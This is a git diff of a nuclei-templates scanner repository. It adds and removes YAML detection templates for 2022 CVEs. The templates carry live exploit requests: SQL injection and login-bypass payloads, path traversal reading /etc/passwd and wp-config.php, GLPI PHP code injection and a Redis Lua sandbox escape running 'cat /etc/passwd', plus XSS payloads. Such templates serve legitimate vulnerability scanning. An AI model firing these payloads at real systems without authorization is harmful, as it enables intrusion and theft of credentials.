matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Welcome back Administrator!' + - 'action=logout' + - 'Manage Account' + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32025.yaml b/nuclei-templates/CVE-2022/CVE-2022-32025.yaml new file mode 100644 index 0000000000..fb24e14552 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-32025.yaml @@ -0,0 +1,46 @@ +id: CVE-2022-32025 +info: + name: Car Rental Management System v1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/view_car.php?id=. + reference: + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-6.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32025 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-32025 + cwe-id: CWE-89 + metadata: + comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. + shodan-query: http.html:"Car Rental Management System" + verified: "true" + tags: cve,cve2022,carrental,cms,sqli,authenticated +variables: + num: "999999999" +requests: + - raw: + - | + POST /admin/ajax.php?action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}%23&password={{password}} + - | + GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1 + Host: {{Hostname}} + skip-variables-check: true + redirects: true + max-redirects: 2 + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32026.yaml b/nuclei-templates/CVE-2022/CVE-2022-32026.yaml deleted file mode 100644 index 87d30308b6..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-32026.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: CVE-2022-32026 -info: - name: Car Rental Management System v1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/manage_user.php?id=. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-5.md - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32028 - cwe-id: CWE-89 - metadata: - comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. - shodan-query: http.html:"Car Rental Management System" - verified: "true" - tags: cve,cve2022,carrental,cms,sqli,authenticated -variables: - num: "999999999" -requests: - - raw: - - | - POST /admin/ajax.php?action=login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}&password={{password}} - - | - GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1 - Host: {{Hostname}} - skip-variables-check: true - redirects: true - max-redirects: 2 - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32409.yaml b/nuclei-templates/CVE-2022/CVE-2022-32409.yaml deleted file mode 100644 index aec3372d91..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-32409.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2022-32409 -info: - name: i3geo - Directory Traversal - author: pikpikcu - severity: critical - description: A local file inclusion (LFI) vulnerability in the component codemirror.php of Portal do Software Publico Brasileiro i3geo v7.0.5 allows attackers to execute arbitrary PHP code via a crafted HTTP request - reference: - - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt - - https://nvd.nist.gov/vuln/detail/CVE-2022-32409 - - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-32409 - cwe-id: CWE-94 - metadata: - shodan-query: http.html:"i3geo" - verified: "true" - tags: cve,cve2022,i3geo,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-33119.yaml b/nuclei-templates/CVE-2022/CVE-2022-33119.yaml new file mode 100644 index 0000000000..223c8ed044 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-33119.yaml @@ -0,0 +1,35 @@ +id: CVE-2022-33119 +info: + name: NVRsolo v03.06.02 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + NUUO Network Video Recorder NVRsolo v03.06.02 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via login.php. + reference: + - https://github.com/badboycxcc/nuuo-xss/blob/main/README.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-33119 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-33119 + cwe-id: CWE-79 + metadata: + shodan-query: http.html:"NVRsolo" + verified: "true" + tags: cve,cve2022,nvrsolo,xss +requests: + - raw: + - | + POST /login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: "><" + + language=en&user=user&pass=pass&submit=Login + matchers: + - type: dsl + dsl: + - 'contains(all_headers, "text/html")' + - 'status_code == 200' + - contains(body,'<\"?cmd=') + condition: and diff --git a/nuclei-templates/CVE-2022/CVE-2022-34047.yaml b/nuclei-templates/CVE-2022/CVE-2022-34047.yaml deleted file mode 100644 index 4601f6daa5..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-34047.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2022-34047 -info: - name: Wavlink Set_safety.shtml - Password Exposure - author: For3stCo1d - severity: high - description: | - An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd]. - reference: - - https://drive.google.com/file/d/1sTQdUc12aZvJRFeb5wp8AfPdUEkkU9Sy/view?usp=sharing - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34047 - metadata: - verified: true - shodan-query: http.title:"Wi-Fi APP Login" - tags: cve,cve2022,wavlink,router,exposure -requests: - - raw: - - | - GET /set_safety.shtml?r=52300 HTTP/1.1 - Host: {{Hostname}} - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'var syspasswd="' - - 'APP' - condition: and - - type: status - status: - - 200 - extractors: - - type: regex - regex: - - 'syspasswd="(.+?)"' diff --git a/nuclei-templates/CVE-2022/CVE-2022-35416.yaml b/nuclei-templates/CVE-2022/CVE-2022-35416.yaml deleted file mode 100644 index d782414f0d..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-35416.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2022-35416 -info: - name: H3C SSL VPN through 2022-07-10 - Cookie Based XSS - author: 0x240x23elu - severity: medium - description: | - H3C SSL VPN through 2022-07-10 allows wnm/login/login.json svpnlang cookie XSS. - reference: - - https://github.com/advisories/GHSA-9x76-78gc-r3m9 - - https://github.com/Docker-droid/H3C_SSL_VPN_XSS - - https://nvd.nist.gov/vuln/detail/CVE-2022-35416 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-35416 - cwe-id: CWE-79 - metadata: - shodan-query: http.html_hash:510586239 - verified: "true" - tags: cve,cve2022,xss,vpn,h3c -requests: - - raw: - - | - GET /wnm/login/login.json HTTP/1.1 - Host: {{Hostname}} - Cookie: svpnlang= - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-35914.yaml b/nuclei-templates/CVE-2022/CVE-2022-35914.yaml deleted file mode 100644 index 00d4ea6869..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-35914.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2022-35914 - -info: - name: GLPI - Remote Code Execution - author: For3stCo1d - severity: critical - description: | - /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module for GLPI through 10.0.2 allows PHP code injection. - reference: - - https://mayfly277.github.io/posts/GLPI-htmlawed-CVE-2022-35914 - - https://github.com/cosad3s/CVE-2022-35914-poc - - https://nvd.nist.gov/vuln/detail/CVE-2022-35914 - - http://www.bioinformatics.org/phplabware/sourceer/sourceer.php?&Sfs=htmLawedTest.php&Sl=.%2Finternal_utilities%2FhtmLawed - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-35914 - cwe-id: CWE-74 - metadata: - shodan-query: http.favicon.hash:"-1474875778" - verified: "true" - tags: cve,cve2022,glpi,rce - -variables: - cmd: "cat+/etc/passwd" - -requests: - - raw: - - | - POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Cookie: sid=foo - - sid=foo&hhook=exec&text={{cmd}} - - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-36883.yaml b/nuclei-templates/CVE-2022/CVE-2022-36883.yaml deleted file mode 100644 index 2be945f370..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-36883.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2022-36883 -info: - name: A missing permission check in Jenkins Git Plugin 4.11.3 and earlier allows unauthenticated attackers to trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. - severity: high - author: c-sh0 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-36883 - - https://www.jenkins.io/security/advisory/2022-07-27/#SECURITY-284 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N - cvss-score: 7.5 - cve-id: CVE-2022-36883 - cwe-id: CWE-862 - tags: cve,cve2022,jenkins,plugin,git,unauth -requests: - - method: GET - path: - - "{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: body - words: - - '{{randstr}}' diff --git a/nuclei-templates/CVE-2022/cve-2022-0165.yaml b/nuclei-templates/CVE-2022/cve-2022-0165.yaml new file mode 100644 index 0000000000..9c67da252a --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0165.yaml @@ -0,0 +1,29 @@ +id: CVE-2022-0165 + +info: + name: WordPress Page Builder KingComposer <=2.9.6 - Open Redirect + author: akincibor + severity: high + description: WordPress Page Builder KingComposer 2.9.6 and prior does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action (which is available to both unauthenticated and authenticated users). + reference: + - https://wpscan.com/vulnerability/906d0c31-370e-46b4-af1f-e52fbddd00cb + - https://nvd.nist.gov/vuln/detail/CVE-2022-0165 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2022-0165 + cwe-id: CWE-601 + tags: cve,cve2022,wp-plugin,redirect,wordpress,wp,wpscan + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' + +# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/cve-2022-0201.yaml b/nuclei-templates/CVE-2022/cve-2022-0201.yaml new file mode 100644 index 0000000000..b69da0b65f --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0201.yaml @@ -0,0 +1,38 @@ +id: CVE-2022-0201 + +info: + name: WordPress Permalink Manager <2.2.15 - Cross-Site Scripting + author: Akincibor + severity: medium + description: | + WordPress Permalink Manager Lite and Pro plugins before 2.2.15 contain a reflected cross-site scripting vulnerability. They do not sanitize and escape query parameters before outputting them back in the debug page. + reference: + - https://wpscan.com/vulnerability/f274b0d8-74bf-43de-9051-29ce36d78ad4 + - https://plugins.trac.wordpress.org/changeset/2656512 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0201 + cwe-id: CWE-79 + tags: wp-plugin,wpscan,cve,cve2022,xss,wordpress + +requests: + - method: GET + path: + - '{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'pm_query' + condition: and + + - type: word + part: header + words: + - text/html + +# Enhanced by md on 2022/09/08 diff --git a/nuclei-templates/CVE-2022/CVE-2022-0218.yaml b/nuclei-templates/CVE-2022/cve-2022-0218.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-0218.yaml rename to nuclei-templates/CVE-2022/cve-2022-0218.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-0288.yaml b/nuclei-templates/CVE-2022/cve-2022-0288.yaml deleted file mode 100644 index 16085e702d..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0288.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: CVE-2022-0288 - -info: - name: WordPress Ad Inserter <2.7.10 - Cross-Site Scripting - author: DhiyaneshDK - severity: medium - description: | - WordPress Ad Inserter plugin before 2.7.10 contains a cross-site scripting vulnerability. It does not sanitize and escape the html_element_selection parameter before outputting it back in the page. - reference: - - https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42 - - https://nvd.nist.gov/vuln/detail/CVE-2022-0288 - remediation: Fixed in version 2.7.12 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-0288 - cwe-id: CWE-79 - tags: wordpress,xss,wpscan,cve,cve2022 - -requests: - - method: POST - path: - - "{{BaseURL}}" - - headers: - Content-Type: "application/x-www-form-urlencoded" - - body: | - html_element_selection= - - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "" - - "ad-inserter" - condition: and - - - type: word - part: header - words: - - "text/html" - -# Enhanced by md on 2022/09/08 diff --git a/nuclei-templates/CVE-2022/cve-2022-0422.yaml b/nuclei-templates/CVE-2022/cve-2022-0422.yaml deleted file mode 100644 index 2593d09fd5..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0422.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: CVE-2022-0422 - -info: - name: WordPress White Label CMS <2.2.9 - Cross-Site Scripting - author: random-robbie - severity: medium - description: | - WordPress White Label CMS plugin before 2.2.9 contains a reflected cross-site scripting vulnerability. It does not sanitize and validate the wlcms[_login_custom_js] parameter before outputting it back in the response while previewing. - reference: - - https://wpscan.com/vulnerability/429be4eb-8a6b-4531-9465-9ef0d35c12cc - - https://plugins.trac.wordpress.org/changeset/2672615 - - https://nvd.nist.gov/vuln/detail/CVE-2022-0422 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-0422 - cwe-id: CWE-79 - tags: cve,cve2022,wordpress,xss,wp-plugin,wpscan - -requests: - - raw: - - | - POST /wp-login.php?wlcms-action=preview HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - wlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "alert(/XSS/);" - - - type: word - part: body - words: - - "wlcms-login-wrapper" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by md on 2022/09/08 diff --git a/nuclei-templates/CVE-2022/cve-2022-0482.yaml b/nuclei-templates/CVE-2022/cve-2022-0482.yaml new file mode 100644 index 0000000000..9e6755261d --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0482.yaml @@ -0,0 +1,57 @@ +id: CVE-2022-0482 + +info: + name: Easy!Appointments <1.4.3 - Broken Access Control + author: francescocarlucci,opencirt + severity: critical + description: | + Easy!Appointments prior to 1.4.3 allows exposure of Private Personal Information to an unauthorized actor via the GitHub repository alextselegidis/easyappointments. + reference: + - https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/ + - https://github.com/alextselegidis/easyappointments + - https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0482 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.1 + cve-id: CVE-2022-0482 + cwe-id: CWE-863 + tags: cve,cve2022,easyappointments + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + - | + POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + csrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01 + + extractors: + - type: kval + part: header + name: csrf_token + kval: + - "csrfCookie" + internal: true + + cookie-reuse: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - '"appointments":' + - '"unavailables":' + condition: and + +# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2022/cve-2022-0540.yaml b/nuclei-templates/CVE-2022/cve-2022-0540.yaml new file mode 100644 index 0000000000..ad50fa4868 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0540.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-0540 + +info: + name: Atlassian Jira Seraph - Authentication Bypass + author: DhiyaneshDK + severity: critical + description: | + Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0. + reference: + - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0540 + - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20 + remediation: Ensure you are using the latest version and that all security patches have been applied. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-0540 + cwe-id: CWE-287 + metadata: + shodan-query: http.component:"Atlassian Jira" + tags: cve,cve2022,atlassian,jira,exposure,auth-bypass + +requests: + - method: GET + path: + - '{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'General Insight Configuration' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2022/cve-2022-0543.yaml b/nuclei-templates/CVE-2022/cve-2022-0543.yaml new file mode 100644 index 0000000000..d26e91ee2f --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0543.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-0543 + +info: + name: Redis Sandbox Escape - Remote Code Execution + author: dwisiswant0 + severity: critical + description: | + This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The + vulnerability was introduced by Debian and Ubuntu Redis packages that + insufficiently sanitized the Lua environment. The maintainers failed to + disable the package interface, allowing attackers to load arbitrary libraries. + reference: + - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce + - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis + - https://bugs.debian.org/1005787 + - https://www.debian.org/security/2022/dsa-5081 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2022-0543 + metadata: + shodan-query: redis_version + tags: cve,cve2022,network,redis,unauth,rce,kev + +network: + - inputs: + - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n" + + host: + - "{{Hostname}}" + - "{{Host}}:6379" + read-size: 64 + + matchers: + - type: regex + regex: + - "root:.*:0:0:" + +# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2022/cve-2022-0653.yaml b/nuclei-templates/CVE-2022/cve-2022-0653.yaml deleted file mode 100644 index 97a429face..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0653.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2022-0653 - -info: - name: Wordpress Profile Builder Plugin Cross-Site Scripting - author: dhiyaneshDk - severity: medium - description: | - The Profile Builder User Profile & User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.. - reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653 - - https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/ - - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2655168%40profile-builder&new=2655168%40profile-builder&sfp_email=&sfph_mail= - remediation: Upgrade to version 3.6.5 or later. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-0653 - cwe-id: CWE-79 - tags: cve,cve2022,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'here' - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2022/cve-2022-0776.yaml b/nuclei-templates/CVE-2022/cve-2022-0776.yaml deleted file mode 100644 index 39746c0077..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0776.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2022-0776 - -info: - name: RevealJS postMessage <4.3.0 - Cross-Site Scripting - author: LogicalHunter - severity: high - description: RevealJS postMessage before 4.3.0 contains a cross-site scripting vulnerability via the document object model. - reference: - - https://hackerone.com/reports/691977 - - https://github.com/hakimel/reveal.js/pull/3137 - - https://huntr.dev/bounties/be2b7ee4-f487-42e1-874a-6bcc410e4001/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-0776 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cwe-id: CWE-79 - cve-id: CVE-2022-0776 - tags: hackerone,huntr,cve,cve2022,headless,postmessage,revealjs - -headless: - - steps: - - args: - url: "{{BaseURL}}" - action: navigate - - action: waitload - - action: script - name: extract - args: - code: | - () => { - return (Reveal.VERSION <= "3.8.0" || Reveal.VERSION < "4.3.0") - } - - matchers: - - type: word - part: extract - words: - - "true" - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-0870.yaml b/nuclei-templates/CVE-2022/cve-2022-0870.yaml new file mode 100644 index 0000000000..e97ed1ef8a --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0870.yaml @@ -0,0 +1,54 @@ +id: CVE-2022-0870 + +info: + name: Gogs - SSRF + author: Akincibor + severity: medium + description: Server-Side Request Forgery (SSRF) in Gogs prior to 0.12.5. + reference: + - https://huntr.dev/bounties/327797d7-ae41-498f-9bff-cc0bf98cf531/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0870 + - https://github.com/gogs/gogs/commit/91f2cde5e95f146bfe4765e837e7282df6c7cabb + - https://huntr.dev/bounties/327797d7-ae41-498f-9bff-cc0bf98cf531 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2022-0870 + cwe-id: CWE-918 + metadata: + shodan-query: http.favicon.hash:-449283196 + tags: cve,cve2022,ssrf,gogs,huntr + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + name: version + internal: true + group: 1 + regex: + - '
\n\s+© \d{4} Gogs Version: ([\d.]+) Page:' + + - type: regex + group: 1 + regex: + - '
\n\s+© \d{4} Gogs Version: ([\d.]+) Page:' + + matchers-condition: and + matchers: + + - type: regex + part: body + regex: + - '
\n\s+© \d{4} Gogs Version: ([\d.]+) Page:' + + - type: dsl + dsl: + - compare_versions(version, '< 0.12.5') + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-0921.yaml b/nuclei-templates/CVE-2022/cve-2022-0921.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-0921.yaml rename to nuclei-templates/CVE-2022/cve-2022-0921.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-1040.yaml b/nuclei-templates/CVE-2022/cve-2022-1040.yaml deleted file mode 100644 index c21e4a0d94..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-1040.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2022-1040 - -info: - name: Sophos Firewall <=18.5 MR3 - Remote Code Execution - author: For3stCo1d - severity: critical - description: | - Sophos Firewall version v18.5 MR3 and older contains an authentication bypass vulnerability in the User Portal and Webadmin which could allow a remote attacker to execute code. - reference: - - https://github.com/killvxk/CVE-2022-1040 - - https://github.com/CronUp/Vulnerabilidades/blob/main/CVE-2022-1040_checker - - https://nvd.nist.gov/vuln/detail/CVE-2022-1040 - - https://www.sophos.com/en-us/security-advisories/sophos-sa-20220325-sfos-rce - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-1040 - cwe-id: CWE-287 - metadata: - shodan-query: http.title:"Sophos" - verified: "true" - tags: cve,cve2022,sophos,firewall,auth-bypass,rce,kev - -requests: - - method: POST - path: - - "{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"🦞\":\"test\"}" - - headers: - X-Requested-With: "XMLHttpRequest" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "{\"status\":\"Session Expired\"}" - - - type: word - part: header - words: - - "Server: xxxx" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/19 diff --git a/nuclei-templates/CVE-2022/cve-2022-1119.yaml b/nuclei-templates/CVE-2022/cve-2022-1119.yaml deleted file mode 100644 index 2e0ecf66e8..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-1119.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2022-1119 - -info: - name: WordPress Simple File List <3.2.8 - Local File Inclusion - author: random-robbie - severity: high - description: | - WordPress Simple File List before 3.2.8 is vulnerable to local file inclusion via the eeFile parameter in the ~/includes/ee-downloader.php due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files. - reference: - - https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e - - https://wpscan.com/vulnerability/075a3cc5-1970-4b64-a16f-3ec97e22b606 - - https://plugins.trac.wordpress.org/browser/simple-file-list/trunk/includes/ee-downloader.php?rev=2071880 - - https://nvd.nist.gov/vuln/detail/CVE-2022-1119 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-1119 - cwe-id: CWE-22 - tags: wp,wp-plugin,wpscan,cve,cve2022,lfi,wordpress - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "DB_NAME" - - "DB_PASSWORD" - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/cve-2022-1221.yaml b/nuclei-templates/CVE-2022/cve-2022-1221.yaml new file mode 100644 index 0000000000..6c2b34470f --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-1221.yaml @@ -0,0 +1,45 @@ +id: CVE-2022-1221 + +info: + name: WordPress Gwyn's Imagemap Selector <=0.3.3 - Cross-Site Scripting + author: veshraj + 